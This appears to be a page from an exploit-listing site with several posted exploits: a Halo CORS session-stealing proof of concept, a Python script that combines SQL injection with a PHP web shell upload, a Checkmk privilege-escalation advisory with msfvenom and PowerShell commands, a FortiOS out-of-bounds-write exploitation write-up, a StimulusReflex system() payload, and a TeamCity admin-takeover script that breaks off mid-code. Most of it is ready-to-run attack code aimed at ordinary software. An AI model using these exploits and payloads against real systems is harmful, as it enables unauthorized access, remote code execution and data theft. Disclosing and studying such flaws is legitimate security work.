Latest exploits :: CodePwn

<pre><code>## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted ## Author: nu11secur1ty ## Date: 03/15/2024 ## Vendor: https://www.halo.run/ ## Software: https://github.com/halo-dev/halo ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin null The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe or malicious fishing domain with a specially crafted HTML exploit. STATUS: HIGH- Vulnerability [+]Exploit: ```HTML <html> <body> <center> <h2>CORS POC Exploit <h3>Extract SID <div id="demo"> <button type="button" onclick="cors()">Exploit Click here </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhttp.open("GET", "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-", true); xhttp.withCredentials = true; xhttp.send(); } </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html) ## Time spent: 00:25:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>from requests_toolbelt.multipart.encoder import MultipartEncoder import requests import string import random import os # ======================================================================================================== # Application: Membership Management System # Bugs: SQL injection + Insecure File Upload = Remote Code Execution # Date: 14.03.2024 # Exploit Author: SoSPiro # Vendor Homepage: https://codeastro.com/author/nbadmin/ # Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/ # Version: 1.0 # -------------------------------------------------- # Vulnerability Description: # The sql injection vulnerability was found in the file `Membership-PHP/index.php` # The login page located at MembershipM-PHP/index.php contains a SQL Injection vulnerability. # This vulnerability allows attackers to inject malicious SQL code into the input fields used to provide login credentials. # Through this exploit, unauthorized users can gain access to sensitive data or even take control of the system. # Vulnerable Code Section: # $email = $_POST['email']; # $password = $_POST['password']; # $hashed_password = md5($password); # $sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'"; # The Insecure File Upload vulnerability appeared in this file `MembershipM-PHP/settings.php` # The MembershipM-PHP/settings.php file contains an insecure file upload vulnerability. # This allows attackers to upload unauthorized files to the server and potentially execute remote code execution (RCE) attacks. # Vulnerable Code Section: # if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) { # $logoName = $_FILES['logo']['name']; # $logoTmpName = $_FILES['logo']['tmp_name']; # $logoType = $_FILES['logo']['type']; # $uploadPath = 'uploads/'; # $targetPath = $uploadPath . $logoName; # if (move_uploaded_file($logoTmpName, $targetPath)) { # $updateSettingsQuery = "UPDATE settings SET system_name = '$systemName', logo = '$targetPath', currency = '$currency' WHERE id = 1"; # $updateSettingsResult = $conn->query($updateSettingsQuery); # if ($updateSettingsResult) { # $successMessage = 'System settings updated successfully.';} else { # $errorMessage = 'Error updating system settings: ' . $conn->error;}} else { # $errorMessage = 'Error moving uploaded file.';}} # -------------------------------------------------- # reference : https://sospiro014.github.io/Membership-Management-System-RCE # I created the python code used in the exploit by looking at this https://www.exploit-db.com/exploits/50123 source and modifying it # ======================================================================================================== # generate random string 8 chars def randomGen(size=8, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size)) # generating a random username and a random web shell file shellFile = randomGen() + ".php" # creating a payload for the login payload = { "email": "test@mail.com' or 0=0 #", "password": "a", "login": "" } session = requests.Session() # changeme urlBase = "http://172.17.86.197/" # change this target ip :) # login url = urlBase + "index.php" print("=== executing SQL Injection ===") req = session.post(url, payload, allow_redirects=False) # check if 'Set-Cookie' header is present in the response if 'Set-Cookie' in req.headers: cookie = req.headers["Set-Cookie"] print("=== authenticated admin cookie:" + cookie + " ===") else: print("Set-Cookie header not found in the response.") exit() # upload shell url = urlBase + "settings.php" # Get user input for the command to execute cmd_input = input("Enter the command to execute: ") # PHP code to execute the command received from the user php_code = "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>" mp_encoder = MultipartEncoder( fields={ "systemName": "Membership System", "currency": "$", "logo": (shellFile, php_code, "application/x-php"), "updateSettings": "" } ) headers = { "Cookie": cookie, 'Content-Type': mp_encoder.content_type } print("=== login user and uploading shell " + shellFile + " ===") req = session.post(url, data=mp_encoder, allow_redirects=False, headers=headers) # curl the shell for test requestUrl = "curl " + urlBase + "uploads/" + shellFile + "?cmd=" + cmd_input print("=== issuing the command: " + requestUrl + " ===") print("=== CURL OUTPUT ===") os.system(requestUrl) </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240307-0 > ======================================================================= title: Local Privilege Escalation via writable files product: Checkmk Agent vulnerable version: 2.0.0, 2.1.0, 2.2.0 fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1 CVE number: CVE-2024-0670 impact: high homepage: https://checkmk.com found: 2023-12-01 by: Michael Baer (Office Fürth) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Checkmk 2.2 has arrived – and is ready to monitor your hybrid IT infrastructure with new features for monitoring native cloud applications, OpenShift support, an expanded REST API, UX improvements, enhanced integrations and over 174 new or reworked checks and agents. Monitor your cloud assets from top hyperscalers with Checkmk 2.2 in addition to the powerful monitoring of your on-premises networks and servers." Source: https://checkmk.com/product/latest-version Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Local Privilege Escalation via writable files (CVE-2024-0670) In some cases, the software creates temporary files inside the directory C:\Windows\Temp that get executed afterwards. An attacker can leverage this to place write-protected malicious files in the directory beforehand. The files get executed by Checkmk with SYSTEM privileges allowing attackers to escalate their privileges. Proof of concept: ----------------- 1) Local Privilege Escalation via writable files (CVE-2024-0670) In the first step, the filename that will be used by Checkmk needs to be found. The application creates temporary files with name cmk_{}_{}_{}.cmd. The placeholders are replaced with a string, the process id and a counter. The first string was always 'all' and the counter usually is 0. The process id is not exactly predictable. However, Windows assigns those numbers in increasing order. This allows to observe the currently used process ids and define a limited range of probable ids. In the second step, the attacker places the malicious binary into the folder C:\Windows\Temp multiple times. The filenames are constructed using the above pattern for all different probable ids. After placing the files, the attacker marks them as read-only. Both can be automated using the following powershell command. Here, the range of probable ids was determined to be between 10000 and 30000. The file C:\Users\attacker\Desktop\mal.exe is the malicious file. 10000..30000 | foreach { copy C:\Users\attacker\Desktop\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; } For this proof of concept, a binary was created using msfvenom that executes the command whoami and writes the result to a file. This will allow to verify the successful execution as the SYSTEM user. The following command was used: msfvenom -p windows/exec CMD='cmd /c "whoami > C:\abc\file"' -f exe -o mal.exe It should be noted, that the folder C:\abc has to exist and that the anti-virus solution must be disabled to execute this particular binary. The final step is to force Checkmk to write and execute those temporary files. It was observed that repairing the software is enough. This repair process can be initiated via the Windows GUI or using the following command. The name fafda3e.msi will be different on every system. The folder C:\Windows\Installer can be investigated to find the correct name on a given system. msiexec /fa C:\Windows\Installer\fafda3e.msi After the repairing finished, the file written by the malicious binary can be checked. It was created and contains the string "nt authority\system". [see figure checkmk_tempfolder.png] Vulnerable / tested versions: ----------------------------- The following version has been tested: * 2.1.0 According to the vendor, the following versions are affected: * 2.0.0 * 2.1.0 * 2.2.0 Vendor contact timeline: ------------------------ 2024-01-15: Contacting vendor through security@checkmk.com 2024-01-18: Vendor confirms vulnerability, assigns CVE, and prepares a fix 2024-01-26: Providing credits and acknowledging CVSS score. 2024-03-04: Vendor informs us that fixes with Werk #16361 are available. 2024-03-07: Coordinated release of security advisory. Solution: --------- Install the latest version 2.1.0p40 or 2.2.0p23 from the vendor's download page: https://checkmk.com/download More information can be found within the vendor's security advisory: https://checkmk.com/werk/16361 Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Michael Baer / @2024 </code></pre>

<pre><code># CVE-2024-21762 out-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability Vulnerability ===== FortiGate released a version update in February, fixing multiple medium- and high-risk vulnerabilities. One of the severe-level vulnerabilities is an unauthorized out-of-bounds write vulnerability in SSL VPN. The vulnerability warning states that this vulnerability may be exploited in the wild. This article will introduce the author's analysis of the process of exploiting this vulnerability to achieve remote code execution. ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/7f0e0f05-9d1b-4e4e-b877-646dc585f07a) The environment used for vulnerability analysis in this article is `FGT_VM64-v7.4.2.F-build2571` diff ====== Comparing the binaries of the repaired versions (7.4.2 and 7.4.3), the analysis found that the repair code is located in function `sub_18F4980`(7.4.2). ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a07f1ef5-5fc6-451b-9613-d1adbeb1e734) Analyzing this function, it is not difficult to find that the logic of this function is to read the body data of the HTTP POST request. At the same time, Transfer-Encodingit is determined according to the request header whether to read in chunk format or based on Content-Lengthreading. According to the control flow graph comparison results, there are two code modifications: When parsing the chunk format, call ap_getlinethe read chunk length and check ap_getlinewhether the return value is greater than 16. If it is greater than 16, it is considered an illegal chunk length. ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/079c74e6-1302-42ce-bb83-519e11d9505b) When reading the chunk trailer, the source of the written \r\noffset is `line_offthe` assignment source, `line_offthe` value before repair is from , and the return value after `*(_QWORD *)(a1 + 744)` repair is . `line_offap_getline` Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification. ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a11a4bea-7e45-4ec7-b63c-34f8dd0337c0) Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification. ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/63f92eaf-68f6-4d32-935b-0451e5da07dc) At the same time, reading the code can tell that when the value of the chunk length field is 0 after hex decoding, it will enter the logic of chunk trailer reading. Triggering out-of-bounds ========= After analyzing the patch, we can draw the following conclusions: 1. When parsing a chunk, if the hex decoded value of the chunk length field is 0, start reading the chunk trailer. 2. After calling ap_getline to read the chunk trailer, it will be written to the buffer according to the length of the chunk length field `\r\n`. 3. Therefore, if many 0s are passed in the chunk length field, and the length of 0s is greater than 1/2 of the remaining buffer length, an out-of-bounds write will be triggered \r\n. Through debugging, we can know that the target buffer is located on the stack `(function sub_1A111E0)` , and the return address is stored at offset 0x2028. If written at offset 0x202e `\r\n`, reta crash will occur due to an illegal address when the function returns to execute the instruction to resume rip. Crash PoC: ```http pkt = b"""\ GET / HTTP/1.1 Host: %s Transfer-Encoding: chunked %s\r\n%s\r\n\r\n""" % (hostname.encode(), b"0"*((0x202e//2)-2), b"a") ssock = create_ssock(hostname, port) ssock.send(pkt) ssock.recv(4096) ``` Crash scene: ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b948f525-bee9-4344-85c1-b1fce8d65acb) By analyzing the cause of the vulnerability, it can be seen that the vulnerability can be used to write `\r\n` two bytes out of bounds on the stack, and the out-of-bounds range is close to `0x2000`. Since the written content is very limited, RCE cannot be achieved by directly hijacking rip. Therefore, you need to focus on the memory pointer saved on the stack. failed attempt ============ What is easier to think of is to hijack rbp and overwrite the low byte of rbp so that rbp just points to a controllable memory area. When the upper-level function returns to execute the instruction, rip can be completely hijacked. However, during verification, it was found that even if rbp on the stack is overwritten, rsp and rip cannot be hijacked, and the program will not even crash. Continuing to trace back up, we find the parent function . This function is not called to restore rsp when it returns , but directly , so it cannot achieve the expected effect. leave retsub_1A111E0sub_1A26040 leave retadd rsp, 0x18 ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9097dd29-45a8-41c7-99be-eddd88308cce) Find another breakthrough point ====== As seen in the previous section, the function saves the values of the five registers `rbx` and r12-r15 on the stack, and restores these registers when the function returns. Continue backtracking to find the parent function . You can see that what is saved in r13 is exactly the parameters `sub_1A26040sub_1A27650a1` . a1 is a structure pointer. Through debugging, we can also see that a heap address is saved on the stack r13 ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/8d419563-39f1-47b0-93b5-8f438cdecbf7) If the memory in the red area in the figure is overwritten by out-of-bounds writing, then the r13 register is restored when the function returns, and the value of the pointer can be tampered with . If the heap memory can be laid out so that a1 points to a memory area arranged in advance, then the entire a1 structure can be hijacked. At the same time, through analysis of the code logic of and , there are a large number of dynamic function calls of a1 multi-level structure members, so there will be more opportunities to hijack **a1.sub_1A26040a1sub_1A27650sub_1A26040** Hijacking a structure ============== According to the assumption, after the low byte of the a1 pointer is overwritten , it can point to the pre-arranged memory. as the picture shows: `\r\n` ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/16ecb081-617e-42a6-b0d7-f009d0a235a3) In order to achieve this effect, the following conditions need to be met: The `a1` structure address is higher than the heap spray area address, and the gap between them is very small. `0x7fxxxxxxx0a0d` Must point to the forged structure. Debugging can find that the size of the a1 structure is `0x730` . According to the alignment rules of jemalloc, a heap block of size `0x800` will be allocated. The 0x800 heap block is not commonly used during request processing, so it is easy to exhaust the `0x800` heap block in tcache, and at the same time apply for more new 0x800 blocks, so that they can enter tcache after release. Heap injection also selects heap blocks of uncommon sizes so that the newly applied heap blocks are continuous and close to the newly applied 0x800; heap injection chooses to use larger heap blocks to ensure that their addresses are aligned with 0x800, so that It is easy to ensure that the lower 12 bits of each forged structure address are 0xa0d; the heap spray range is not less than `0x10000` to ensure that it points to the heap spray area. The effect after hijacking is as follows: `0x7fxxxxxxx0a0d` ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/4553bf2f-7590-4dcd-bd94-972465e7be5f) Find exploitable multi-level pointers ====================== Through the above operations, the hijacking of the a1 structure can be achieved. Combing through the code of function sum, there are many dynamic calls to the second-level pointer and third-level pointer of the a1 structure member, for example: `sub_1A27650sub_1A26040` ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f9f65242-90dd-43ee-8fdb-95fa9059805e) When `(0<N<5)` is satisfied , it will be called dynamically . Therefore, the member needs to be faked into a multi-level pointer, which ultimately points to the function we want to call. Since the target binary does not have PIE protection turned on, you can find qualified multi-level pointers in the target binary. Analyzing the binary, we can find that the first points to the GOT table address of the corresponding function.`*(_BYTE *)(a1+0x20*(N+6)+0x10)&6==0*(__int64 (__fastcall **)(__int64))(*(_QWORD *)(*(_QWORD *)(a1 + 0x298)+0x70)+0xC0)(a1)a1 + 0x298` ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9d274361-093b-4042-9c67-bd5083c8d888) ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f27436b9-a3d1-4650-85d6-6117b57ad3a3) Therefore, taking functions as an example, you can find qualified multi-level pointers **system** ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/3ca3f7d6-b416-4cf8-9c41-6f6eb1e79b0e) During heap spraying, changing the value at offset 0x298 of the structure can be used to call the system function. The effect is as follows: `0x4368d0` ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/c19cfc84-c3c3-43a5-909b-5d5eee935815) As shown in the figure, the parameter of the dynamic call is exactly a1, and the memory pointed to is controllable. At this point, you can normally use the system function to execute any command. However, in FortiGate, the file does not have the ability to execute commands, so using the system function to execute commands cannot be executed successfully. `/bin/sh` Hijack RIP ============ Since the system function cannot execute commands, we can only find other ways to complete RCE. The existing condition is that any GOT table function can be called, and the memory pointed to by the first parameter of the function is controllable. Therefore, if there is a function in the GOT table that will call back a certain member of the parameter, there is a chance to achieve RIP hijacking. It’s easy to think of functions that were often used in previous FortiGate exploits . **SSL_do_handshake** ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/bc6aaf2a-9c58-4ade-9af0-ccadcc79274b) You only need to construct the SSL structure so that the conditions are met and the final call is made to realize rip hijacking and hijack rip to 0xdeadbeef as shown in the `figure:s->handshake_func(s)` ![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b3979820-893f-47e3-bd94-b63fa58a7bb7) The FortiGate main program is an All-in-One binary with a size of over 70MB. There are a large number of gadgets that can be used. It is not difficult to implement RCE using ROP, so I won’t go into details. ### demo : Although web mode is turned off by default in SSL VPN version 7.4.2 and browser access returns 403, this vulnerability can still be exploited in the default configuration. ![ezgif-6-c1d88c0511](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/0e8188fa-de85-4579-b932-924c0e54b334) This vulnerability is similar to the heap overflow vulnerability caused by XOR last year . They are both seemingly useless overflow vulnerabilities. The exploitation process is more tricky and more like a CTF question. However, compared with traditional CTF problems that attack heap managers, real vulnerabilities require more context structures and code logic to be exploited. The author's level is limited. If there are any mistakes, please correct me.CVE-2023-27997 original post In Chinese : https://mp.weixin.qq.com/s?__biz=Mzk0OTU2ODQ4Mw==&mid=2247484811&idx=1&sn=2e0407a32ba0c2925d6d857f4cdf7cbb&chksm=c3571307f4209a110d6b28cea9fe59ac0f0a2079c998a682e919860f397ea647fa0794933906&mpshare=1&scene=1&srcid=0313EaETjGzEAvOdByUt6ovU#rd </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Emegrab.b Vulnerability: Remote Stack Buffer Overflow (SEH) Family: Emegrab Type: PE32 MD5: 19a14d0414aec62ef38378de2e8b259d Vuln ID: MVID-2024-0675 ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 03/13/2024 Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH). Memory Dump: (14c0.b6c): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000 eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:009> .ecxr eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000 eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:009> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e *** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e - FAULTING_IP: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b 0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8) ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 26100000 Attempt to write to address 26100000 PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b 0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al FAILED_INSTRUCTION_ADDRESS: +fa2b 41414141 ?? ??? NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 IP_IN_FREE_BLOCK: 41414141 CONTEXT: 260f5e38 -- (.cxr 0x260f5e38) eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74 eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b: 0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=?? Resetting default scope FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b FRAME_ONE_INVALID: 1 STACK_TEXT: 260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b 260fff88 41414141 unknown!printable+0x0 260fff8c 41414141 unknown!printable+0x0 260fff90 41414141 unknown!printable+0x0 260fff94 41414141 unknown!printable+0x0 260fff98 41414141 unknown!printable+0x0 260fff9c 41414141 unknown!printable+0x0 260fffa0 41414141 unknown!printable+0x0 260fffa4 41414141 unknown!printable+0x0 260fffa8 41414141 unknown!printable+0x0 260fffac 41414141 unknown!printable+0x0 260fffb0 41414141 unknown!printable+0x0 260fffb4 41414141 unknown!printable+0x0 260fffb8 41414141 unknown!printable+0x0 260fffbc 41414141 unknown!printable+0x0 260fffc0 41414141 unknown!printable+0x0 260fffc4 41414141 unknown!printable+0x0 260fffc8 41414141 unknown!printable+0x0 260fffcc 41414141 unknown!printable+0x0 260fffd0 41414141 unknown!printable+0x0 260fffd4 41414141 unknown!printable+0x0 260fffd8 41414141 unknown!printable+0x0 260fffdc 41414141 unknown!printable+0x0 260fffe0 41414141 unknown!printable+0x0 260fffe4 41414141 unknown!printable+0x0 260fffe8 41414141 unknown!printable+0x0 260fffec 41414141 unknown!printable+0x0 260ffff0 41414141 unknown!printable+0x0 260ffff4 41414141 unknown!printable+0x0 260ffff8 41414141 unknown!printable+0x0 260ffffc 41414141 unknown!printable+0x0 26100000 41414141 unknown!printable+0x0 STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b 0:009> !exchain 260013fc: ntdll!ExecuteHandler2+44 (775e9d70) 260fffcc: 41414141 Invalid exception stack at 41414141 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=2323 s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="A"*666 s.send(PAYLOAD.encode()) s.close() print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln") Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>StimulusReflex CVE-2024-28121 Arbitrary code execution in StimulusReflex. This affects version 3.5.0 up to and including 3.5.0.rc2 and v3.5.0.pre10. ## Vulnerable code excerpt stimulus_reflex/lib/stimulus_reflex/reflex.rb ``` # Invoke the reflex action specified by `name` and run all callbacks def process(name, *args) run_callbacks(:process) { public_send(name, *args) } end ``` stimulus_reflex/app/channels/stimulus_reflex/channel.rb ``` def delegate_call_to_reflex(reflex) method_name = reflex.method_name arguments = reflex.data.arguments method = reflex.method(method_name) policy = StimulusReflex::ReflexMethodInvocationPolicy.new(method, arguments) if policy.no_arguments? reflex.process(method_name) elsif policy.arguments? reflex.process(method_name, *arguments) else raise ArgumentError.new("wrong number of arguments (given #{arguments.inspect}, expected #{policy.required_params.inspect}, optional #{policy.optional_params.inspect})") end end ``` stimulus_reflex/lib/stimulus_reflex/policies/reflex_invocation_policy.rb ``` module StimulusReflex class ReflexMethodInvocationPolicy attr_reader :arguments, :required_params, :optional_params def initialize(method, arguments) @arguments = arguments @required_params = method.parameters.select { |(kind, _)| kind == :req } @optional_params = method.parameters.select { |(kind, _)| kind == :opt } end def no_arguments? arguments.size == 0 && required_params.size == 0 end def arguments? arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size end def unknown? return false if no_arguments? return false if arguments? true end end end ``` ## Payload Find a websocket message with target and args. ``` \"target\":\"StimulusReflex::Reflex#render_collection\",\"args\":[{\"inline\": \"<% system('[command here]') %>\"}] ``` </code></pre>

<pre><code>#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) #- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648 #- Exploit Author: ByteHunter #- Vendor: JetBrains #- Email: 0xByteHunter@proton.me #- vendor: JetBrains #- Version: versions before 2023.05.4 #- Tested on: 2023.05.3 #- CVE : CVE-2023-42793 import requests import argparse import re import random import string import subprocess banner = """ ===================================================== * CVE-2023-42793 * * TeamCity Admin Account Creation * * * * Author: ByteHunter * ===================================================== """ print(banner) parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC") parser.add_argument("-u", "--url", required=True, help="Target URL") parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode") args = parser.parse_args() url = args.url if url.startswith("https://"): curl_command = "curl -k" else: curl_command = "curl" get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" create_user_url = f"{url}/app/rest/users" create_user_command = "" token = "" response = requests.post(get_token_url, verify=False) if response.status_code == 200: match = re.search(r'value="([^"]+)"', response.text) if match: token = match.group(1) print(f"Token: {token}") else: print("Token not found in the response") elif response.status_code == 404: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 